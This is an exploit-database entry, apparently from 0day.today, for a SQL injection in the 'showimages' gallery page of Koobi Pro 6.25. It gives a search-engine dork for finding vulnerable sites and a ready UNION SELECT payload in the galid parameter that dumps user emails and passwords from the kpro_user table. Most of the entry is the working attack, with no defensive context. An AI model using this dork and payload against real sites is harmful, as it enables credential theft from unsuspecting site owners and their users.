id: 2855
date: 04/07/2008
title: Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability
author: S@BUN
cves: 

============================================================
Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability
============================================================



#########################################
#
# Koobi Pro V6.25 showimages (galid)
#
###########################################
#
# DORK 1 : allinurl: "index.php?area"galid
#
###########################################
EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user

###########################################



#  0day.today [2023-03-24]  #